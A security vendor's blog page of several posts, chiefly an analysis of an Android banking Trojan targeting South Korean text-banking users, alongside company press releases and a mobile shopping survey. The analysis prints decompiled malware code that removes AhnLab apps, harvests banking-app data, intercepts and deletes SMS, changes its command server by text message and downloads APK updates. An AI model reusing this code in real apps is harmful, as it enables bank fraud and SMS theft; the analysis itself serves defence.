Trustlook is part of the blazing fast Qualcomm Snapdragon 835 chipset

Lynn La from CNET wrote a great story describing the benefits of the new Qualcomm Snapdragon 835 chipset. And low and behold, she also included an image of the Trustlook Mobile Security app (image #16 in the story), which is part of the new Snapdragon chipset. Make sure your next device takes advantage of the speed and security that the new Qualcomm Snapdragon 835 chip offers.

Read about it here.


Senior Avast Sales Leader Joins Trustlook as VP of Global Sales and Business Development

Everyone here at Trustlook is thrilled to welcome Fangyu Ding to the team. Fangyu brings a lot of security experience to our company. Below is the official press release that went out today.


Trustlook, the company that offers SECUREai, a suite of embeddable security engines that identify advanced malware using proprietary AI technology, today announced that Fangyu Ding has joined the company as Senior Vice President of Global Sales and Business Development, reporting to Allan Zhang, Co-Founder and CEO of Trustlook. Ding brings extensive management experience and a global perspective to Trustlook’s executive team during a period of rapid growth and expansion. His responsibilities include global sales and oversight of Trustlook’s business development operations.

“Fangyu is a proven leader and industry veteran who will help us scale, and play a key role in executing on our growth strategy as we continue our evolution to a multi-product cybersecurity solution,” said Allan Zhang, Co-Founder and CEO of Trustlook. “His wealth of experience with global executives and security teams has given him a clear understanding of precisely what our marketplace needs and how best to deliver it. I’m delighted to be working with him as Trustlook enters its next stage of expansion.”

Ding brings to Trustlook 20 years of leadership experience in the security sector, including mobile devices, network appliances, and the Internet of Things. He was most recently Vice President of Business Development for AVG, the multi-billion-dollar cybersecurity company that was acquired by Avast in 2016. Ding has long been a proponent of dynamic behavioral detection technology in the cybersecurity industry in his work with Sana Security, an early pioneer of AI for PC malware, which was later acquired by AVG. He has a proven ability to drive organizations through various stages of development to become truly global companies.

“With its revolutionary SECUREai security engine, Trustlook has a significant opportunity to help organizations across the world access the latest advancements in cybersecurity,” said Fangyu Ding, Senior Vice President of Global Sales and Business Development at Trustlook. “Trustlook has industry-leading technology and strong partnerships with worldwide tech leaders such as Huawei, Qualcomm, and Tecno. This puts us in a strong position in the $200 billion cybersecurity market. I look forward to capitalizing fully on this opportunity.”

Ding has an MBA from the Haas School of Business at the University of California, Berkeley. His role will be based out of the company’s headquarters in San Jose, California, but he will also spend significant time supporting Trustlook’s China office, as the company continues to solidify its position as the market leader in China.

Trojan Intercepts SMS Messages To Attack Banks In South Korea

Banks in South Korea recently started to offer customers a text messaging option to access accounts and authenticate transactions. It was reported that a major South Korea bank, KEB Hana Bank, was the first to launch the text banking service in the country on Nov 21, 2016. Unfortunately, cyber thieves have picked up on this, and are trying to get their hands on these text messages.

Trustlook labs discovered a new banking Trojan that targets these banks in South Korea that offer the text messaging service. The Trojan disguises itself as a Google Play app and the user is requested to grant device administrator rights for it. This prevents the malware for being removed.

The app starts as a background service and is invisible to the user. The package can be identified as having the following characteristics:

  • MD5: b4d419cd7dc4f7bd233fa87f89f73f22
  • SHA256: 1fa03f9fa2c6744b672433c06a1a3142997ba4f261b68eddbc03545caff06a82
  • Size: 100289 bytes
  • App name: Google_Play
  • Package name:

The package icon is:


Upon execution, the app persuades the user to grant device administrator access in order to maintain its presence on the system:


The app disguises itself as “AhnLab V3 Mobile PLUS” which is a popular mobile security app in South Korea.


In the meantime, it attempts to remove the legitimate AhnLab security apps:

 public void onClick(View arg2) {

       GeneralUtil.uninstallAPK(((Context)this), "com.ahnlab.v3mobileplus");

       GeneralUtil.uninstallAPK(((Context)this), "com.ahnlab.v3mobilesecurity.soda");

The malware attempts to collects the user’s device information and send it to the server:


It then goes through the system to look for the following banking apps:

  • com.shinhan.sbanking
  • com.webcash.wooribank
  • com.kbstar.kbbank

The following code snippets are used to retrieve information on any installed banking apps:

public class FBDBSender

   private void uploadInstallApp() {

       try {


           boolean v1 = CoreService.checkAPP(((Context)this), "");

           boolean v2 = CoreService.checkAPP(((Context)this), "com.shinhan.sbanking");

           boolean v3 = CoreService.checkAPP(((Context)this), "");

           boolean v4 = CoreService.checkAPP(((Context)this), "com.webcash.wooribank");

           boolean v5 = CoreService.checkAPP(((Context)this), "com.kbstar.kbbank");

           String v6 = this.getVersion("");

           String v7 = this.getVersion("com.shinhan.sbanking");

           String v8 = this.getVersion("");

           String v9 = this.getVersion("com.webcash.wooribank");

           String v10 = this.getVersion("com.kbstar.kbbank");


           UploadInstallAppTask v12 = new UploadInstallAppTask(this);

           String[] v13 = new String[10];

           String v11 = v1 ? "1" : "0";

           v13[0] = v11;

           v11 = v2 ? "1" : "0";

           v13[1] = v11;

           int v14 = 2;

           v11 = v3 ? "1" : "0";

           v13[v14] = v11;

           v14 = 3;

           v11 = v4 ? "1" : "0";

           v13[v14] = v11;

           v14 = 4;

           v11 = v5 ? "1" : "0";

           v13[v14] = v11;

           v13[5] = v6;

           v13[6] = v7;

           v13[7] = v8;

           v13[8] = v9;

           v13[9] = v10;



The malware then sends out the captured information:


The malware intercepts all the SMS messages between the device and the banks and sends it to the attacker:

public class SMSReceiver extends BroadcastReceiver {

   static final String ACTION = "android.provider.Telephony.SMS_RECEIVED";

   private final String TAG;

   public SMSReceiver() {


       this.TAG = "sms Receiver";


   public void onReceive(Context arg23, Intent arg24) {

       if("android.provider.Telephony.SMS_RECEIVED".equals(arg24.getAction())) {

           Bundle v3 = arg24.getExtras();

           if(v3 != null) {

               SmsInfoDao v13 = new SmsInfoDao(arg23);

               Object v10 = v3.get("pdus");

               SmsMessage[] v8 = new SmsMessage[v10.length];

               int v4;

               for(v4 = 0; v4 < v10.length; ++v4) {

                   v8[v4] = SmsMessage.createFromPdu(v10[v4]);


               SmsMessage[] v2 = v8;

               int v6 = v2.length;

               int v5;

               for(v5 = 0; v5 < v6; ++v5) {

                   SmsMessage v7 = v2[v5];

                   new Date().toString();

                   String v15 = v7.getDisplayOriginatingAddress();

                   String v16 = v7.getDisplayMessageBody();

                   if(v16.startsWith(Constant.NEW_SERVER_MSG_PREFIX)) {

                       String v9 = v16.substring(Constant.NEW_SERVER_MSG_PREFIX.length());

                       if(v9.startsWith("http")) {

                           Log.d("sms Receiver", "new address:" + v9);

                           SharedPreferences v11 = PreferenceManager.getDefaultSharedPreferences(arg23);

                           App.URL_BASE = v9;

                           v11.edit().putString("serverIp", v9).commit();



                   if(App.curInterceptState != 0 && System.currentTimeMillis() - App.curInterceptStateStartTime < 9223372036854775807L) {

                       SmsInfo v12 = new SmsInfo();

                       v12._id = (((int)Math.round(Math.random() * 9999999 + 1))) * -1;

                       v12.thread_id = "";

                       v12.service_center = "";

              = "";

                       v12.phoneNumber = v15;

                       v12.smsbody = v16;

              = new Date().getTime();

                       v12.type = 0;








   public class SMSContent extends ContentObserver {

       public SMSContent(CoreService arg1, Handler arg2) {

           CoreService.this = arg1;



       public void onChange(boolean arg23) {

           Log.i("SMS Core Service", "smsÓб仯");


           Cursor v8 = App.getInstance().getContentResolver().query(Uri.parse("content://sms/inbox"), null, " read = ?", new String[]{"0"}, "date asc");

           if(v8 != null && (v8.moveToFirst())) {

               int v10 = v8.getColumnIndex("_id");

               int v19 = v8.getColumnIndex("thread_id");

               int v16 = v8.getColumnIndex("service_center");

               int v12 = v8.getColumnIndex("person");

               int v14 = v8.getColumnIndex("address");

               int v18 = v8.getColumnIndex("body");

               int v9 = v8.getColumnIndex("date");

               int v20 = v8.getColumnIndex("type");

               do {

                   SmsInfo v17 = new SmsInfo();

                   v17._id = v8.getInt(v10);

                   v17.thread_id = v8.getString(v19);

                   v17.service_center = v8.getString(v16);

          = v8.getString(v12);

                   v17.phoneNumber = v8.getString(v14);

                   v17.smsbody = v8.getString(v18);

          = v8.getLong(v9);

                   v17.type = v8.getInt(v20);

                   if(!CommUtil.isEmpty(v17.smsbody)) {

                       Toast.makeText(CoreService.this, v17.smsbody + "", 0).show();

                       Log.i("SMS Core Service", v17.smsbody);

                       if(v17.smsbody.trim().startsWith(Constant.NEW_SERVER_MSG_PREFIX)) {

                           String v13 = v17.smsbody.substring(Constant.NEW_SERVER_MSG_PREFIX.length());

                           Log.i("SMS Core Service", v13);

                           Toast.makeText(CoreService.this, ((CharSequence)v13), 0).show();

                           if(v13.startsWith("http")) {

                               Log.d("SMS Core Service", "new server address:" + v13);

                               SharedPreferences v15 = PreferenceManager.getDefaultSharedPreferences(CoreService.this);

                               App.URL_BASE = v13;

                               v15.edit().putString("serverIp", v13).commit();

                               CoreService.this.getContentResolver().delete(Uri.parse("content://sms/" + v17._id), null, null);




                       else if(v17.smsbody.trim().startsWith(Constant.LOCK_SCREEN_ON)) {

                           Log.i("SMS Core Service", v17.smsbody.trim() + " is not startsWith " + Constant.NEW_SERVER_MSG_PREFIX);


                       Log.d("SMS Core Service", "insert sms to db");





                       if(App.curInterceptState == 0) {



                       if(System.currentTimeMillis() - App.curInterceptStateStartTime >= 9223372036854775807L) {



                       CoreService.this.getContentResolver().delete(Uri.parse("content://sms/" + v17._id), null, null);









The app is capable of updating itself:

     protected String[] doInBackground(AppUpdateModel[] arg11) {

           String[] v6;

           try {

               AppUpdateModel v1 = arg11[0];

               String v2 = App.URL_BASE + v1.getUpdateUrl();

               Log.i("SMS Core Service", v2);

               long v4 = System.currentTimeMillis();

               CoreService.this.lastFileName = v4 + ".apk";

               v6 = new String[]{NetUtils.downApk(v2, v4 + ".apk", CoreService.this), v1.getAppPackageName()};



For anyone using the text banking service that is being offered by some Korean banks, we suggest you install the Trustlook Mobile Security app to detect and block this attack, as well as to prevent further malicious activities.

Over 70 Percent Will Shop on Mobile This Holiday Season

Shopping on a mobile device is expected to be stronger than ever during the 2016 Holiday Season. Smartphone proliferation, faster network speeds, and slick shopping apps have combined to provide a far better experience for mobile shoppers. But as the spending is soaring, so too are the mobile security risks.

Trustlook, a next-generation mobile security company, has shared findings from a recent survey of Android users. The goal of the survey was to dig deeper into the expected mobile shopping behaviors for the 2016 Holiday season. Some key findings include:

1. 43% of users surveyed will spend more than $250 on purchases made through a mobile device
2. 40% of mobile shoppers prefer shopping on their mobile devices, versus 18% who prefer shopping in a store
3. Even though 70.35% of users surveyed plan on making a purchase on a mobile device, 64% have not installed a mobile security app
4. Amazon, eBay, and Walmart are the most popular mobile shopping apps

For an infographic on Trustlook’s survey findings, please go here.

What is Firmware Over the Air FOTA?

The recent data theft incident involving ADUPS technologies has brought into focus FOTA, which stands for Firmware Over the Air. For many, this is a new terminology concept and a whole new concept. Most consumers are familiar with downloading software updates to a phone or computer. But firmware downloads must be handled differently because they deal with different components and operations on a device.

Firmware Over-The-Air (FOTA) is a Mobile Software Management (MSM) technology that wirelessly upgrades the operating firmware of a mobile device. FOTA-capable phones download upgrades directly from the service provider. The process usually takes three to 10 minutes, depending on connection speed and file size. ADUPS is a service provider, and provides FOTA service for hundreds of companies including ZTE, Huawei, and BLU Products.

See our infographic to learn more about how FOTA works.

Trustlook Releases ADUPS Vulnerability Detector

Trustlook has released a new feature in its Trustlook Mobile Security app that identifies the presence of rogue firmware from Shanghai ADUPS Technology Co. This potentially dangerous firmware comes pre-installed on some Android phones, and can monitor text messages, phone call histories, and details of how the phone is being used all without the user’s permission.

Until now, there was no easy way for users to check for this vulnerability. Only the most technically sophisticated users could identify the threat by observing the network traffic. Now, Trustlook is providing an easy-to-use, single-click ADUPS Vulnerability detector within the Trustlook Mobile Security app.

The Trustlook Mobile Security app is available to download for free from Google Play. It currently checks for all known versions of the ADUPS system apps that conduct aggressive data collection, with more being added as they are discovered.

We have also created an infographic with more details on the ADUPS threat.